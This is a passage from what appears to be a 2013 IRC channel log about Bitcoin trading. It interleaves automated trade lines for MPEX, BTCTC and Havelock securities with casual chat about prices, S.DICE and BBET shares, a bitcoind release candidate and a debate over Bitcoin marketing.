11.5414 BTC [-] Feb 10 01:10:06 [MPEX] [S.MPOE] 7993 @ 0.00063719 = 5.0931 BTC [-] Feb 10 01:10:26 Ooh. looks like Litecoin made a nice recovery too Feb 10 01:10:28 O_O Feb 10 01:12:51 did it? Feb 10 01:13:23 there is a reward to troll somethingawful . com?? :) Feb 10 01:13:37 well the usd value at least Feb 10 01:13:43 8 cents /ltc Feb 10 01:13:49 from 5.4 ltc a month ago Feb 10 01:13:54 ah, yeah Feb 10 01:14:55 does mircea_popescu have his own irc channel :) Feb 10 01:15:33 galambo drop this in -otc Feb 10 01:15:55 ;;view 13393 Feb 10 01:15:57 #13393 Sat Feb 9 02:16:26 2013 mircea_popescu BUY 1.0 SA gift cert @ 0.5 BTC ((You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register )) Feb 10 01:15:57 [MPEX] [S.MPOE] 1457 @ 0.00063719 = 0.9284 BTC [-] Feb 10 01:15:58 [MPEX] [S.MPOE] 11250 @ 0.00063684 = 7.1645 BTC [-] Feb 10 01:16:00 [MPEX] [S.MPOE] 1795 @ 0.00063656 = 1.1426 BTC [-] Feb 10 01:16:26 what am i looking at here Feb 10 01:16:42 oh ok Feb 10 01:17:18 then troll SA? Feb 10 01:17:19 ;p; Feb 10 01:17:20 lol Feb 10 01:17:45 they seem to hate buttcoins Feb 10 01:18:25 [MPEX] [S.MPOE] 5905 @ 0.00063656 = 3.7589 BTC [-] Feb 10 01:18:27 [MPEX] [S.MPOE] 3893 @ 0.00063438 = 2.4696 BTC [-] Feb 10 01:18:46 They hate everything Feb 10 01:19:03 but their own hate. They're just dislike it, not hate. Feb 10 01:20:04 They must be Kefkas or something Feb 10 01:20:10 http://finalfantasy.wikia.com/wiki/Kefka_Palazzo Feb 10 01:20:49 actually i suppose it's just a front. Feb 10 01:21:24 holy crpa.. me night actually hit $30 again Feb 10 01:21:43 me night yea Feb 10 01:22:32 lol yup Feb 10 01:24:35 [MPEX] [S.MPOE] 60198 @ 0.00063547 = 38.254 BTC [+] Feb 10 01:25:16 basically we are just taking off.. on the way to the moon! Feb 10 01:26:31 i was thinking, remarkably enough i didnt sell that many options Feb 10 01:28:08 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.05037102 = 50.371 BTC [-] Feb 10 01:28:59 [MPEX] [O.BTCUSD.C200T] 10 @ 0.21662797 = 2.1663 BTC [+] Feb 10 01:29:07 gone Feb 10 01:35:00 lol http://www.reddit.com/r/BitcoinInvesting ... anyone dares to add first post? Feb 10 01:35:22 why dont you just put it on 4chan Feb 10 01:35:55 yes? did it work with bit4x? Feb 10 01:36:27 urlpls Feb 10 01:36:45 [BTCTC] [GSDPT] 218 @ 0.006 = 1.308 BTC [-] Feb 10 01:37:30 isuccumbed who the fuck is that ? Feb 10 01:41:08 http://satoshitemple.com/index.html "site dedicated to the infinite wisdom of Bitcoin creator Satoshi Nakamoto" Feb 10 01:41:31 Each day I will channel Satoshi's spirit and I will post his message in this page. Feb 10 01:43:17 people will leech anything. Feb 10 01:48:58 [MPEX] [S.MPOE] 27500 @ 0.00064422 = 17.7161 BTC [+] Feb 10 01:49:07 [MPEX] [S.MPOE] 1542 @ 0.00063956 = 0.9862 BTC [-] Feb 10 01:49:38 [HAVELOCK] [SDICE] 13 @ 0.668 = 8.684 BTC [+] Feb 10 01:50:06 why isnt mp sleeping Feb 10 01:50:24 truffles lol Feb 10 01:51:06 [BTCTC] [MININGCO.ETF] 1 @ 0.56 BTC [+] Feb 10 01:51:07 [BTCTC] [MININGCO.ETF] 3 @ 0.56 = 1.68 BTC [+] Feb 10 01:51:40 the subreddits are amazing Feb 10 01:51:52 there is like nudes and everything Feb 10 01:52:07 are Feb 10 01:52:16 english is my 1st langugage... Feb 10 01:53:12 [MPEX] [S.MPOE] 12812 @ 0.00063956 = 8.194 BTC [-] Feb 10 01:53:14 [MPEX] [S.MPOE] 8338 @ 0.00063696 = 5.311 BTC [-] Feb 10 01:56:10 [MPEX] [S.MPOE] 17400 @ 0.00064522 = 11.2268 BTC [+] Feb 10 01:56:11 [MPEX] [S.MPOE] 11740 @ 0.00064745 = 7.6011 BTC [+] Feb 10 01:56:24 i don't sleep because i sustain myself consuming souls. Feb 10 01:56:37 and on a related note, it looks like i'm getting farsi faq for mpex. Feb 10 01:56:45 [BTCTC] [GSDPT] 448 @ 0.0061 = 2.7328 BTC [+] Feb 10 01:56:47 [BTCTC] [GSDPT] 1182 @ 0.0061 = 7.2102 BTC [+] Feb 10 01:59:11 [MPEX] [S.MPOE] 5400 @ 0.00063696 = 3.4396 BTC [-] Feb 10 02:00:00 [MPEX] [S.MPOE] 4962 @ 0.00063696 = 3.1606 BTC [-] Feb 10 02:00:07 [MPEX] [S.MPOE] 7702 @ 0.00063547 = 4.8944 BTC [-] Feb 10 02:00:09 [MPEX] [S.MPOE] 2765 @ 0.00063438 = 1.7541 BTC [-] Feb 10 02:00:10 [MPEX] [S.MPOE] 11771 @ 0.00063325 = 7.454 BTC [-] Feb 10 02:03:35 [BTCTC] [BTC-BOND] 22 @ 0.0099 = 0.2178 BTC [+] Feb 10 02:04:00 [MPEX] [S.MPOE] 6100 @ 0.00064745 = 3.9494 BTC [+] Feb 10 02:10:40 [MPEX] [S.MPOE] 11357 @ 0.00063325 = 7.1918 BTC [-] Feb 10 02:10:42 [MPEX] [S.MPOE] 2093 @ 0.00063195 = 1.3227 BTC [-] Feb 10 02:13:25 [MPEX] [S.MPOE] 3507 @ 0.00063195 = 2.2162 BTC [-] Feb 10 02:13:27 [MPEX] [S.MPOE] 10000 @ 0.00063003 = 6.3003 BTC [-] Feb 10 02:13:32 [MPEX] [S.MPOE] 9993 @ 0.00063002 = 6.2958 BTC [-] Feb 10 02:15:28 [MPEX] [S.MPOE] 11000 @ 0.00064745 = 7.122 BTC [+] Feb 10 02:19:45 [MPEX] [S.MPOE] 40007 @ 0.00063002 = 25.2052 BTC [-] Feb 10 02:19:47 [MPEX] [S.MPOE] 13412 @ 0.00062912 = 8.4378 BTC [-] Feb 10 02:19:49 [MPEX] [S.MPOE] 13380 @ 0.00062888 = 8.4144 BTC [-] Feb 10 02:22:18 [BTCTC] [BTC-BOND] 244 @ 0.0099 = 2.4156 BTC [+] Feb 10 02:25:07 [MPEX] [S.MPOE] 7020 @ 0.00062888 = 4.4147 BTC [-] Feb 10 02:25:10 [MPEX] [S.MPOE] 6750 @ 0.00062663 = 4.2298 BTC [-] Feb 10 02:25:12 [MPEX] [S.MPOE] 26430 @ 0.00062071 = 16.4054 BTC [-] Feb 10 02:36:06 [MPEX] [S.MPOE] 490 @ 0.00061978 = 0.3037 BTC [-] Feb 10 02:37:11 just trying new bitcoind 0.8.0rc1 Feb 10 02:37:58 i like it, after 40mins is almost fully synchronized with locally running bitcoind 0.7 Feb 10 02:38:26 and rpc calls return immediately even during this heavy activity! Feb 10 02:38:34 :-) Feb 10 02:40:26 jurov: there a thread on getting it working -- can't recall the switches to have it load the old blockchain Feb 10 02:40:39 dump! dump! dump! Feb 10 02:40:58 i just moved the .bitcoin dir and copied only conf and wallet file Feb 10 02:41:16 dump usd and switch to btc!! Feb 10 02:41:48 [MPEX] [S.MPOE] 13861 @ 0.00061978 = 8.5908 BTC [-] Feb 10 02:44:15 i enjoy it, but would prefer my s.mpoe holdings to not sink so rapidly Feb 10 02:48:23 :D Feb 10 02:52:21 [BTCTC] [BTC-BOND] 8 @ 0.01 = 0.08 BTC [+] Feb 10 02:52:22 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Feb 10 02:52:25 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Feb 10 02:52:25 [BTCTC] [BTC-BOND] 393 @ 0.01 = 3.93 BTC [+] Feb 10 02:54:59 [MPEX] [S.MPOE] 21299 @ 0.00063037 = 13.4263 BTC [+] Feb 10 02:55:05 [MPEX] [S.MPOE] 36800 @ 0.00063403 = 23.3323 BTC [+] Feb 10 03:02:33 [MPEX] [S.MPOE] 15450 @ 0.00063926 = 9.8766 BTC [+] Feb 10 03:02:35 [MPEX] [S.MPOE] 3850 @ 0.00063545 = 2.4465 BTC [-] Feb 10 03:02:36 [MPEX] [S.MPOE] 2201 @ 0.00063501 = 1.3977 BTC [-] Feb 10 03:04:09 sync finished... and it ran with ionice -c 3 Feb 10 03:07:24 waited for your comment.. wasn;t disappointed Feb 10 03:07:56 how many times? Feb 10 03:08:34 X X X Feb 10 03:09:46 [MPEX] [S.MPOE] 31910 @ 0.00063298 = 20.1984 BTC [-] Feb 10 03:14:31 [MPEX] [S.MPOE] 19839 @ 0.00063298 = 12.5577 BTC [-] Feb 10 03:14:36 [MPEX] [S.MPOE] 461 @ 0.00064237 = 0.2961 BTC [+] Feb 10 03:14:46 fuk Feb 10 03:14:51 i was gonna buy that Feb 10 03:14:52 [BTCTC] [GSDPT] 18 @ 0.0061 = 0.1098 BTC [+] Feb 10 03:19:35 [MPEX] [S.MPOE] 7850 @ 0.00062742 = 4.9252 BTC [-] Feb 10 03:24:20 hrm, i can't make a buy order on bitfunder Feb 10 03:25:35 it's not recoginizing my full balance, and i have no open orders Feb 10 03:27:45 [MPEX] [S.MPOE] 4800 @ 0.00062742 = 3.0116 BTC [-] Feb 10 03:28:14 what you gonna buy on bitfunder? Feb 10 03:28:35 ThickAsThieves, you don't have any reserves? Feb 10 03:29:29 click your balance in the upper corner and check reserves Feb 10 03:36:07 [MPEX] [S.MPOE] 8300 @ 0.00062723 = 5.206 BTC [-] Feb 10 03:36:48 it says 0 resrved Feb 10 03:38:27 [MPEX] [S.MPOE] 17689 @ 0.00064237 = 11.3629 BTC [+] Feb 10 03:38:32 [MPEX] [S.MPOE] 10150 @ 0.00064275 = 6.5239 BTC [+] Feb 10 03:38:33 [MPEX] [S.MPOE] 4960 @ 0.00064286 = 3.1886 BTC [+] Feb 10 03:38:37 [MPEX] [S.MPOE] 2485 @ 0.00064745 = 1.6089 BTC [+] Feb 10 03:38:39 [MPEX] [S.MPOE] 2583 @ 0.00064962 = 1.678 BTC [+] Feb 10 03:38:40 [MPEX] [S.MPOE] 22133 @ 0.00064996 = 14.3856 BTC [+] Feb 10 03:43:38 [HAVELOCK] [SDICE] 45 @ 0.719 = 32.355 BTC [+] Feb 10 03:45:18 Whoa, Havelock Feb 10 03:49:49 ;;ticker Feb 10 03:49:49 BTCUSD ticker | Best bid: 23.93000, Best ask: 23.94870, Bid-ask spread: 0.01870, Last trade: 23.94870, 24 hour volume: 35935.13720042, 24 hour low: 22.58468, 24 hour high: 23.98961, 24 hour vwap: 23.31661 Feb 10 03:50:03 jesus Feb 10 03:50:03 nice Feb 10 03:50:13 3000 calls from 17-20 Feb 10 03:50:14 expectations at 24? Feb 10 03:50:15 :) Feb 10 03:50:44 Lets do 30 Feb 10 03:51:07 I expect it to pull back 1-2 $ briefly than continue up to 27 by opex Feb 10 03:51:10 17.42K to get to 25! Feb 10 03:51:20 o? Feb 10 03:51:22 that's up Feb 10 03:51:25 actually Feb 10 03:51:28 sounds reasonable Feb 10 03:51:31 ;;asks 30 Feb 10 03:51:33 There are currently 27737.938 bitcoins offered at or under 30.0 USD, worth 718342.093212 USD in total. Feb 10 03:51:36 ;;asks 25 Feb 10 03:51:37 There are currently 17384.043 bitcoins offered at or under 25.0 USD, worth 429617.169782 USD in total. Feb 10 03:52:03 half a mil to clear 25. Feb 10 03:52:16 whale pump and dumps in action again. Feb 10 03:52:17 [MPEX] [S.MPOE] 2800 @ 0.00063413 = 1.7756 BTC [-] Feb 10 03:52:27 holy crap look at those sell walls go up Feb 10 03:52:51 aaaaaaaaaaaaaaaaand there gone. Feb 10 03:52:55 they're Feb 10 03:53:09 huh? Feb 10 03:53:18 what did i miss/ Feb 10 03:53:21 bitcoinity.org/markets can act a little funny sometimes. Feb 10 03:53:25 nothing. Feb 10 03:53:40 they they do volume on the lower graph, asks. Feb 10 03:53:54 is funny Feb 10 03:54:21 oh I see Feb 10 03:54:34 someone put up a wall at 25 Feb 10 03:54:40 thats why its 17k Feb 10 03:54:55 probably just for the weekend till his wire cclears Feb 10 03:55:19 bitcoin is great fun. Feb 10 03:55:23 i need whiskey Feb 10 03:55:50 [MPEX] [S.MPOE] 2500 @ 0.00063413 = 1.5853 BTC [-] Feb 10 03:55:53 [MPEX] [S.MPOE] 3354 @ 0.00063741 = 2.1379 BTC [+] Feb 10 04:04:09 it seems to me Feb 10 04:04:25 that the idea behind bitcoin is.. Feb 10 04:04:28 pump and dont dump Feb 10 04:08:05 i'm waiting for the developing world to figure it out Feb 10 04:08:16 mkt cap ~ 2 US street corner banks atm Feb 10 04:08:48 not to mention the friction in software that keeps normal humans out Feb 10 04:08:54 fix those problems Feb 10 04:09:01 boom, to several billion. Feb 10 04:09:14 but i r idiots as my parents say regularly :( Feb 10 04:12:50 [MPEX] [S.MPOE] 1000 @ 0.00064003 = 0.64 BTC [+] Feb 10 04:12:52 [MPEX] [S.MPOE] 4146 @ 0.00064002 = 2.6535 BTC [-] Feb 10 04:12:59 [MPEX] [S.MPOE] 11988 @ 0.00063575 = 7.6214 BTC [-] Feb 10 04:14:47 benkay: it'll be orders of magnitude more imho Feb 10 04:15:02 yeah. somewhere, right? Feb 10 04:15:09 [MPEX] [S.MPOE] 1390 @ 0.00063125 = 0.8774 BTC [-] Feb 10 04:15:10 [MPEX] [S.MPOE] 11860 @ 0.00062759 = 7.4432 BTC [-] Feb 10 04:15:27 i have this attitude that beyond more than 5 orders of magnitude it just doesn't make sense to try and be accurate. Feb 10 04:15:31 6B? Feb 10 04:15:34 60B? Feb 10 04:15:49 don't care. holdings will be worth something cool at that point, and i won't really be able to tell the difference. Feb 10 04:16:01 in the meantime, focus on being a better coder every day. Feb 10 04:16:28 well, i figure with say 600-800Tn of derivatives out there divided over say 11mn... Feb 10 04:16:58 plus some Feb 10 04:17:07 [MPEX] [S.MPOE] 1000 @ 0.0006276 = 0.6276 BTC [+] Feb 10 04:17:08 [MPEX] [S.MPOE] 3986 @ 0.00062759 = 2.5016 BTC [-] Feb 10 04:17:09 [MPEX] [S.MPOE] 4303 @ 0.00062205 = 2.6767 BTC [-] Feb 10 04:17:12 [MPEX] [S.MPOE] 15911 @ 0.00061978 = 9.8613 BTC [-] Feb 10 04:18:01 sorry, not tracking. 11 million what? Feb 10 04:18:14 well, btc total so far. Feb 10 04:18:27 oh, and talking about all derivatives on the market? Feb 10 04:18:35 oh i guess 10.761... or something Feb 10 04:22:01 http://www.satoshidice.com/ not loading? Feb 10 04:22:12 so I gather that all assets stabilize or go up when BTC jump in price? by virtue of .... BTC being worth more? Feb 10 04:22:21 [MPEX] [S.MPOE] 2785 @ 0.00062414 = 1.7382 BTC [+] Feb 10 04:22:23 [MPEX] [S.MPOE] 7415 @ 0.00061978 = 4.5957 BTC [-] Feb 10 04:22:27 ThickAsThieves: loads fo rme Feb 10 04:22:50 just hangs for me Feb 10 04:23:13 [MPEX] [S.MPOE] 6787 @ 0.00063233 = 4.2916 BTC [+] Feb 10 04:23:24 does it start loading? Feb 10 04:23:32 or just blank? no data? Feb 10 04:23:33 partially loads someitmes, but without any dynamic text Feb 10 04:24:03 same behavior in two browsers Feb 10 04:24:54 lagging pings Feb 10 04:25:05 maybe since it's in ireland. Feb 10 04:25:31 zero packet loss Feb 10 04:25:38 must be you. on wireless? Feb 10 04:25:44 somebody turned on a microwave next door. Feb 10 04:26:23 hehe Feb 10 04:26:28 i am on wireless Feb 10 04:27:07 [MPEX] [S.MPOE] 1667 @ 0.00064996 = 1.0835 BTC [+] Feb 10 04:27:08 [MPEX] [S.MPOE] 12650 @ 0.00065009 = 8.2236 BTC [+] Feb 10 04:27:14 just tried a wired pc, same prob Feb 10 04:27:21 weird. Feb 10 04:27:42 ping -t satoshidice.com Feb 10 04:27:48 see if you have packet loss. Feb 10 04:28:58 sec Feb 10 04:29:10 whatsmydns.net shows all Xs for NS entries Feb 10 04:29:11 don't you have to put in a ttl with -t> Feb 10 04:29:12 ? Feb 10 04:29:18 ThickAsThieves #bitfunder :) Feb 10 04:29:23 if you want it to stop... Feb 10 04:29:26 :) Feb 10 04:29:33 heheh Feb 10 04:30:01 ThickAsThieves: hit CTRL + C to stop it and get results Feb 10 04:30:04 forgot to say that. Feb 10 04:30:33 0 loss Feb 10 04:30:51 odd Feb 10 04:32:08 that dns thing you mentioned that i just saw seems problematic too. Feb 10 04:32:29 it finally loaded in one tab, after quite a while Feb 10 04:33:58 [MPEX] [S.MPOE] 7483 @ 0.00065031 = 4.8663 BTC [+] Feb 10 04:34:06 [MPEX] [S.MPOE] 8683 @ 0.00063401 = 5.5051 BTC [-] Feb 10 04:47:25 I've never seen the Stochastic RSI level out there before. http://bitcoincharts.com/charts/mtgoxUSD#rg30ztgSzm1g10zm2g25zi1gStochRSIzi2gRSIzi3gCOscillatorzi4gStochRSIzv Feb 10 04:48:02 always pokes up, levels a bit, then drops again Feb 10 04:48:20 [MPEX] [S.MPOE] 10550 @ 0.00062002 = 6.5412 BTC [-] Feb 10 04:49:12 any idea what i could buy into that would make 10% overnight? Feb 10 04:49:17 or by wed? Feb 10 04:52:17 DeadWeasel: what does Stochastic RSI indicate? Feb 10 04:52:24 nvm, i r google Feb 10 04:52:49 [MPEX] [S.MPOE] 35500 @ 0.00062002 = 22.0107 BTC [-] Feb 10 04:53:37 http://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:stochrsi Feb 10 04:53:41 explains in better than i could Feb 10 04:54:03 all i know is I ain't seen it like this before. Feb 10 04:54:13 that there be tha truf. Feb 10 05:00:09 [MPEX] [S.MPOE] 18850 @ 0.00062002 = 11.6874 BTC [-] Feb 10 05:04:59 [MPEX] [S.MPOE] 36900 @ 0.00062002 = 22.8787 BTC [-] Feb 10 05:05:25 [BTCTC] [GSDPT] 192 @ 0.0062 = 1.1904 BTC [+] Feb 10 05:10:13 Still no one selling S.BBET at a decent price? Feb 10 05:10:51 [BTCTC] [BASIC-MINING] 1 @ 0.3498 BTC [+] Feb 10 05:11:07 i don't see bbet on bitfunder. why? Feb 10 05:11:07 Define decent Feb 10 05:11:18 what's bbet? Feb 10 05:11:24 same guys that did s.dice? Feb 10 05:11:30 No Feb 10 05:11:40 bitbet.us? Feb 10 05:11:42 Mp and kakobrekla Feb 10 05:11:46 Yes Feb 10 05:12:03 i would buy shares in that but i own bitbet.com.au and bitbet.asia Feb 10 05:12:14 Lol Feb 10 05:12:44 Namworld, like I am amazed I got out of Feb 10 05:12:46 but maybe i should buy some shares in ts.bbet Feb 10 05:13:03 Bbet at an average price of 130000 Feb 10 05:13:12 2btc revenue Feb 10 05:13:21 Err dividend Feb 10 05:13:23 what exchange is it available at? Feb 10 05:13:31 Mpex Feb 10 05:13:32 MPEx Feb 10 05:13:39 [BTCTC] [BTC-BOND] 24 @ 0.01 = 0.24 BTC [+] Feb 10 05:13:41 and BTCT.co Feb 10 05:13:44 i guess I should say what passthroughs offer it? Feb 10 05:13:51 Namworld what do I think is a good price Feb 10 05:13:52 will it be offered on bitfunder? Feb 10 05:13:52 mine on BTCT.co Feb 10 05:13:59 thx namworld Feb 10 05:13:59 I'd pay up to 0.00065000 Feb 10 05:14:03 i'll sign up. Feb 10 05:14:04 bugpowder Feb 10 05:14:06 [BTCTC] [GSDPT] 1 @ 0.0062 BTC [+] Feb 10 05:14:28 I sold down to 27000 Feb 10 05:14:35 Or 30000 Feb 10 05:14:40 i think bitfunder might offer it Feb 10 05:14:43 27000 I think Feb 10 05:14:53 Have fun with that dudes Feb 10 05:14:56 I'm buying them for the passthrough, I don't hold BBET personally Feb 10 05:14:58 That's quite a Contract on the register page, way to cover yer booty! Feb 10 05:14:58 they said yesterday they got some announcements coming soon Feb 10 05:15:02 I just want a few thousands Feb 10 05:15:20 bitfunder is just easy to use Feb 10 05:16:45 confirm bitfunder is going to offer it Feb 10 05:17:46 [MPEX] [S.MPOE] 11987 @ 0.00062479 = 7.4894 BTC [+] Feb 10 05:19:08 I also like BitFunder's site Feb 10 05:19:22 [MPEX] [S.MPOE] 6600 @ 0.00062377 = 4.1169 BTC [-] Feb 10 05:19:42 I know you were all wondering Feb 10 05:19:45 i was just speaking with them, they are going to offer bbet shares Feb 10 05:19:52 so just wait Feb 10 05:20:08 What's the problem with BTCT.co? Feb 10 05:20:23 BitHub so what's bitbet.com.au do ? Feb 10 05:21:58 enables you to bet on sporting events or social bets etc, at proper betting odds Feb 10 05:21:59 No problem with BTCTco, I use it too, but aesthetically it's a little busier Feb 10 05:22:27 our first big test is the fifa world cuo Feb 10 05:22:28 cup Feb 10 05:22:33 so we're just preparing for that Feb 10 05:22:37 http://www.usabilitypost.com/2010/07/23/a-mild-case-of-borderitis/ Feb 10 05:22:54 i may offer a bet on the australian election tho as our first test Feb 10 05:23:03 from what i see it's just a register this page ? Feb 10 05:23:12 correct, its not live Feb 10 05:23:15 atm Feb 10 05:23:34 mkay. Feb 10 05:23:40 Registration is your first mistake Feb 10 05:23:41 bitcoin has 1000 developers and like 3 promoters Feb 10 05:23:51 it needs exactly the reverse : like 3 devs and 1k+ promoters. Feb 10 05:24:07 i was thinking mircea why don't more bitcoin companies just hire sales team Feb 10 05:24:17 to promote and market bitcoin Feb 10 05:24:19 does bitcoin foundation do outreach/mktg? Feb 10 05:24:21 well, why exactly are you doing that instead of earning referals on bitbet ? Feb 10 05:24:25 Security team would be better idea Feb 10 05:24:33 cause you think you're too good to make money or something, i'd guess. Feb 10 05:25:12 same thing goes for about everyone. just make more services, as if that's where it's at. Feb 10 05:25:13 i had my own idea of doing a gambling site and a few weeks later i see bitbet.us pop up after i already purchased my domains Feb 10 05:25:17 right. Feb 10 05:25:25 i was just about to purchase bitbet.com but the guy pulled out of the auction Feb 10 05:25:31 this is what i'm saying. everyone thinks they should develop. Feb 10 05:25:38 i'm not a developer Feb 10 05:25:42 i hire them Feb 10 05:25:55 well then why aren't you pushing things that are already there ? Feb 10 05:26:12 because i want to push my own things in my own market here Feb 10 05:26:14 im prolly going way too strongly at this, i don't mean you personally. Feb 10 05:26:25 [MPEX] [S.MPOE] 2019 @ 0.00062377 = 1.2594 BTC [-] Feb 10 05:26:27 [MPEX] [S.MPOE] 3031 @ 0.00062002 = 1.8793 BTC [-] Feb 10 05:26:28 right. that's exactly the problem. there's 1000 people who all think they're cowboys. Feb 10 05:26:33 i guess it'll take some (more) time. Feb 10 05:26:38 mp, who pays for the marketing and promo of btc? Feb 10 05:26:50 ThickAsThieves in general ? nobody really. Feb 10 05:26:53 mtgox? Feb 10 05:26:56 i'm paying for my own marketing team Feb 10 05:26:58 i mean who should Feb 10 05:27:04 i don't think anybody should. Feb 10 05:27:05 but i will be marketing and promoting bitcoin on the side Feb 10 05:27:12 oh Feb 10 05:27:24 but you said it needs 1000 to 1 Feb 10 05:27:28 yea, that's the other thing, everyone and his team. it's insanity. Feb 10 05:27:41 ThickAsThieves take a mature market, like say porn. or books. or whatever you will. Feb 10 05:27:51 out of 1000 people involved, 999 are pushing something someone else owns. Feb 10 05:27:55 that's the natural order of things. Feb 10 05:28:01 mircea i try and help out in the community and answer as many questions as i can, i give away alot of btc donations n stuff just for fun Feb 10 05:28:05 what more do you want out of me? Feb 10 05:28:10 in bitcoin, 999 people are making new products which don't go anywhere. Feb 10 05:28:19 BitHub srsly, don't take it personally Feb 10 05:28:23 so a good example would be: Feb 10 05:28:24 i don't mean it about you personally at all. Feb 10 05:28:26 im just whining. Feb 10 05:28:32 I set up a brokerage for SDICE Feb 10 05:28:43 okey :) i know what you're saying tho because i haven't been able to get any help really Feb 10 05:28:44 and convince peopel to buy in in meatspace Feb 10 05:28:47 ThickAsThieves baby, there's already how many of those ? 4 ? 5 ? Feb 10 05:28:48 but i do try and give back Feb 10 05:28:50 why is a 6th needed ? Feb 10 05:28:56 I mean IRL Feb 10 05:28:59 [MPEX] [S.MPOE] 20076 @ 0.00062002 = 12.4475 BTC [-] Feb 10 05:29:04 you mean irl ? what's that mean ? Feb 10 05:29:06 like promote buying shares Feb 10 05:29:16 okay... Feb 10 05:29:26 i dunno Feb 10 05:29:39 what, go door to door ? wth you mean irl ? Feb 10 05:29:59 hehe phone sales, print ads, maybe convincing rich people Feb 10 05:30:02 i dunno Feb 10 05:30:11 yeah, are you somewhere where that's even legal ? Feb 10 05:30:14 what should these 999 peddlers peddle Feb 10 05:30:42 i'm just trying to think of examples of how btc world might operate like porn or such Feb 10 05:30:49 ThickAsThieves let's face it, ok ? all these teams are a guy with MAYBE 10k liquid to his name, a freind from school and maybe some chick either of them or both are diddling. Feb 10 05:30:59 this isn't a team. this is a group of young people, enthusiasts, whatever. Feb 10 05:31:16 they aren't going to compete. bitcoin seems new, but seriously. it takes a lot more than three kids. Feb 10 05:31:21 and their 10k. Feb 10 05:31:46 got to start somewhere tho, i think the biggest problem is all the amatuers and scammers Feb 10 05:32:00 the biggest problem is that nobody wants to start small. Feb 10 05:32:06 [MPEX] [S.MPOE] 1713 @ 0.00062479 = 1.0703 BTC [+] Feb 10 05:32:08 [MPEX] [S.MPOE] 10176 @ 0.00062692 = 6.3795 BTC [+] Feb 10 05:32:12 [MPEX] [S.MPOE] 1484 @ 0.00063269 = 0.9389 BTC [+] Feb 10 05:32:13 dumbasses make ripple. either of them spent the time to get the experience ? no THEY KNOW Feb 10 05:32:14 THEY CAN Feb 10 05:32:17 TJHEY DO Feb 10 05:32:22 fuckall they do, thing;'s unusable. Feb 10 05:32:27 colored coins, same business. Feb 10 05:32:41 "they have to start somewhere" ? how about they start by working their butt off for something that's already here Feb 10 05:32:45 then they start something. Feb 10 05:33:09 so Feb 10 05:33:17 we should all be working for mtgox and sdice? Feb 10 05:33:30 yes. pick a service you like. i don't care what it is, but a name. Feb 10 05:33:34 push it till you make enough to live off. Feb 10 05:33:44 THEN you're in a position to know why the thing you're trying atm won't take off. Feb 10 05:34:12 and don't get pissed off at me, i'm honestly not that involved either way. Feb 10 05:34:15 but it has to be said. Feb 10 05:34:51 i think that's a good thing about a free market, you do have alot of cowboy's and stuff but i think throught the years alot of those guys get weeded out Feb 10 05:35:03 yes, i agree it's a good thing. do you know who it;s a good thing for ? Feb 10 05:35:04 me. Feb 10 05:35:20 i got fuckall knows how many btc, if you kill yourself trying a project that doesn't have a chance you loose, my btc gains. Feb 10 05:35:57 that's the thing. 1k kids with a dream today, 1k corpses on the metaphorical business field of battle, next year. Feb 10 05:36:06 their metaphorical blood fattening the metaphorical earth. Feb 10 05:36:18 seems senseless to me. but then again, im just an asshole so. Feb 10 05:36:19 go ahead. Feb 10 05:36:36 sooo, ThickAsThieves i'm thinking to send some btc to bitfunder to get it ready Feb 10 05:36:49 [MPEX] [S.MPOE] 6500 @ 0.00063785 = 4.146 BTC [+] Feb 10 05:37:18 get what ready? Feb 10 05:37:28 to buy some bbet shares Feb 10 05:37:54 BitHub these other folks think it's maybe oversold by now. they may be right. Feb 10 05:38:10 it pays 1% on referrals, if you get someone to bet 100 btc that's 1btc for you. Feb 10 05:38:14 I'm not interested in bbet shares atm Feb 10 05:38:38 oh must of been someone else i was talking to Feb 10 05:39:09 !ticker m s.bbet Feb 10 05:39:11 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0003 / 0.00091228 / 0.0015999 (20800 shares, 18.98 BTC), 30D: 0.0003 / 0.00149797 / 0.002 (473231 shares, 708.89 BTC) Feb 10 05:39:27 still cheap Feb 10 05:39:40 that's like 9k total Feb 10 05:44:01 try BTCT.co, I have a BBET passthrough there already Feb 10 05:44:10 [MPEX] [S.MPOE] 2627 @ 0.00063444 = 1.6667 BTC [-] Feb 10 05:44:17 [MPEX] [S.MPOE] 6650 @ 0.00063168 = 4.2007 BTC [-] Feb 10 05:44:32 Namworld what's it called ? Feb 10 05:44:35 also bitfunder will be offering bbet shares soon Feb 10 05:46:35 Final SD Profit: 60813.98753788 BTC Feb 10 05:46:37 fuck me. Feb 10 05:46:48 it's making another 20k this month ?! Feb 10 05:46:48 awww yeeee Feb 10 05:46:51 No thanks, I'm good MP Feb 10 05:46:59 time to pay daddy a lil dividend Feb 10 05:47:10 Ukto you haxxor you, when do i see bf ticker in here already! Feb 10 05:47:32 I have been trying to wrap up the new BF features for a couple days now Feb 10 05:47:39 lots of distractions Feb 10 05:47:43 do you have any idea how inconvenient it is to not check the various stuff going on over there ? Feb 10 05:48:11 looking at dooglus' graphs no wonder the fucking whale bought 1mn sdice today Feb 10 05:48:13 hey, you got your favicon you wanted Feb 10 05:48:20 :P Feb 10 05:48:22 oh, a bf ticker would be so friggen good Feb 10 05:48:32 no but srsl;y, you have to do it already. Feb 10 05:48:41 BitHub: yeah I will be pushing the api for kako to set it up in a few days Feb 10 05:49:26 ThickAsThieves do you consider stuff like trolling sa bitcoin marketing ? Feb 10 05:49:54 professional trollers for only 2btc a week Feb 10 05:50:12 [BTCTC] [GSDPT] 1000 @ 0.0062 = 6.2 BTC [+] Feb 10 05:50:30 BitHub it's a tough question he got. what even constitutes btc marketing ? Feb 10 05:50:40 im pushing it in some ways, many other people are too, prolly more than me Feb 10 05:50:59 i think it does actually help Feb 10 05:51:16 probly not ideal Feb 10 05:51:21 but it is attention Feb 10 05:51:59 you can outsource and hire proper marketers Feb 10 05:52:01 very cheaply Feb 10 05:52:14 folks, so S.DICE pays 2000BTC for 10mil or 100mil shares? Feb 10 05:52:21 BitHub yeah, but what'd they do ? Feb 10 05:52:49 vampireb 2k for 10mn last month. by the looks of it 5-10k for the whole 50mn this month Feb 10 05:52:54 in any business mircea when you have a new product or something you hire a sales team or marketing team that goes out as pimps out whatever you want Feb 10 05:53:19 so since 3% were released, so now it will pay for 13% instead of 10% Feb 10 05:53:20 and Feb 10 